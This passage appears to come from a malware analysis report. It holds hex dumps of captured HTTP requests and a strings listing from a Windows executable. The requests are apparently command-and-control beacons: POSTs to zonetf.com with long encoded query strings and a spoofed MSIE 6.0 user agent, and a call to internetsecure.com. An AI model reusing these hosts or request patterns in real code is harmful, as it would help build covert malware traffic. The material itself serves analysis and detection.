0x00000250 (00592)   38624668 31317254 75533634 4e565975   8bFh11rTuS64NVYu
0x00000260 (00608)   41204854 54502f31 2e300d0a 436f6e6e   A HTTP/1.0..Conn
0x00000270 (00624)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000280 (00640)   6f73743a 20777777 2e696e74 65726e65   ost: www.interne
0x00000290 (00656)   74736563 7572652e 636f6d0d 0a416363   tsecure.com..Acc
0x000002a0 (00672)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000002b0 (00688)   67656e74 3a206961 6d782f33 2e31310d   gent: iamx/3.11.
0x000002c0 (00704)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a32 37313431 20202054 75787130   ...27141   Tuxq0
0x00000160 (00352)   30734430 4f704c6a 5271410a            0sD0OpLjRqA.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e7a46 4b763937 35586c6d   X%2BSNzFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a6b4436 4d6d6170   ose......kD6Mmap
0x00000160 (00352)   74387125 32426271 25324275 4a684e66   t8q%2Bbq%2BuJhNf
0x00000170 (00368)   58594663 7666494f 7378306f 43496f68   XYFcvfIOsx0oCIoh
0x00000180 (00384)   6131456e 38767653 79736657 71755625   a1En8vvSysfWquV%
0x00000190 (00400)   32426467 6d567568 426d5667 756f3870   2BdgmVuhBmVguo8p
0x000001a0 (00416)   55797025 32422532 42316571 65702532   Uyp%2B%2B1eqep%2
0x000001b0 (00432)   42535449 774e6e37 49316352 6c253242   BSTIwNn7I1cRl%2B
0x000001c0 (00448)   6f335648 2532426c 41765056 44715235   o3VH%2BlAvPVDqR5
0x000001d0 (00464)   62552532 46744646 68726a6c 4e253242   bU%2FtFFhrjlN%2B
0x000001e0 (00480)   69427535 6166456f 31507348 55446979   iBu5afEo1PsHUDiy
0x000001f0 (00496)   75684564 36565946 5173526d 4c664f76   uhEd6VYFQsRmLfOv
0x00000200 (00512)   78736b7a 57736468 39674132 424e5478   xskzWsdh9gA2BNTx
0x00000210 (00528)   7a4b6648 46587a5a 6e77726a 76697932   zKfHFXzZnwrjviy2
0x00000220 (00544)   25324265 476f684d 384b3168 44615030   %2BeGohM8K1hDaP0
0x00000230 (00560)   7336614e 71684325 32465852 5235344a   s6aNqhC%2FXRR54J
0x00000240 (00576)   59584337 52253242 6441436e 6e4c6c37   YXC7R%2BdACnnLl7
0x00000250 (00592)   38624668 31317254 75533634 4e565975   8bFh11rTuS64NVYu
0x00000260 (00608)   41204854 54502f31 2e300d0a 436f6e6e   A HTTP/1.0..Conn
0x00000270 (00624)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000280 (00640)   6f73743a 20777777 2e696e74 65726e65   ost: www.interne
0x00000290 (00656)   74736563 7572652e 636f6d0d 0a416363   tsecure.com..Acc
0x000002a0 (00672)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000002b0 (00688)   67656e74 3a206961 6d782f33 2e31310d   gent: iamx/3.11.
0x000002c0 (00704)   0a0d0a                                ...


Strings
m&
..
&
040904b0
1282
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
2(Z&an
4bQ";j
^ 4r6X
,!4WAq
4x-Zi[{
58X\N,R
5mjx1w'
5S8C^A
.\5+|VAQ
:|5'ws
7KM*M\
7n8?Lg
8	?3VW}8
}8)+9I
8&Yz\``
9i@`Z\g
!9lOp$
9}YAdK
ADVAPI32.dll
A'\^jW
>,^Al-
AlphaBlend
B7l2/w
BitBlt
BqMZW"r
!c#]%,_
CeY`j3
ClipCursor
\{c	o}
CoCreateInstance
CoFreeUnusedLibraries
CoInitialize
COMCTL32.dll
CoUninitialize
CreateBitmap
CreateCompatibleDC
CreateDCW
CreateDIBSection
CreatePen
CreatePopupMenu
@.data
DeleteDC
DestroyMenu
{d{IXL
ed#b)H
eJB0ZP
e	M'=V
EnumResourceNamesW
Et;CMtt2
*E*w*I
ExitProcess
F#"e;~
FileTimeToDosDateTime
FindWindowA
FqW+UtB
g0Y{UC
GDI32.dll
GdipCreateBitmapFromFile
GdipDisposeImage
GdipGetImageHeight
GdipGetImagePixelFormat
GdipGetImageWidth
gdiplus.dll
GetDesktopWindow
GetModuleFileNameA
GetObjectType
GetVersionExA
gGGZ]|
}gT.MCOC
:{gvf1M
hhlAll
hhLibr
]HPm3}wi
Ht*\oL
^I\7Vbg
I8Jx+VZ}A
i\9}&>
ImageList_DragEnter
ImageList_DragLeave
ImageList_DragMove
in,!i&z/|
;iPg)h
~it&T*
IX>V8|
(Iy>Io:
J?'` ;
JyA7i4%
k1G#'hQ
KB**yS
KERNEL32.dll
Kh`.hL
 KP5-5x
KX{n"@
LineTo
LKuT~z
~lL~?&p
LoadLibraryW
LocalAlloc
LocalFree
&LP!K@
@LP*.wm
m$G@,s
~]mL0z
MSIMG32.dll
N7|8x|E
Ngeid}P
N:%{Iy
,N!RH<
N]uyn2
 O8lat
!o&Bar
ole32.dll
OQ[eehi
*o)!!r
*OU*Ls
O^*>x1
Pa7!'z
P/S/8J
+Q D@"F
Q.h]l@
QQNpaA@
QR|i.fT
q=s?:vektq\
`.rdata
RedrawWindow
RegCloseKey
RegCreateKeyW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
RegSetValueW
RichY5
rjT&]y
rl	.oX{r
SelectObject
SetStretchBltMode
	sH}Ie
s<.hzt@
StretchBlt
StringFromGUID2
!This program cannot be run in DOS mode.
ThLoad
timeGetTime
TrackPopupMenuEx
TransmitCommChar
TransparentBlt
u4_)Td;#
\U_6,>)#
	[u[/G
u"@hM&)
uoi*ZX%
USER32.dll
(^_=(v
"Vv_L~
^w=0w_
W1YuX,
WINMM.dll
WK, *k
W//o\~
"wrlA5
X6-96	c
xCxe`[
y8BO@4m
Y#)$%B
yD	t_C
yt5[7p
y>UuN3U>	
!.]|'z
zioX'2
Z~]~L_
**z:>VA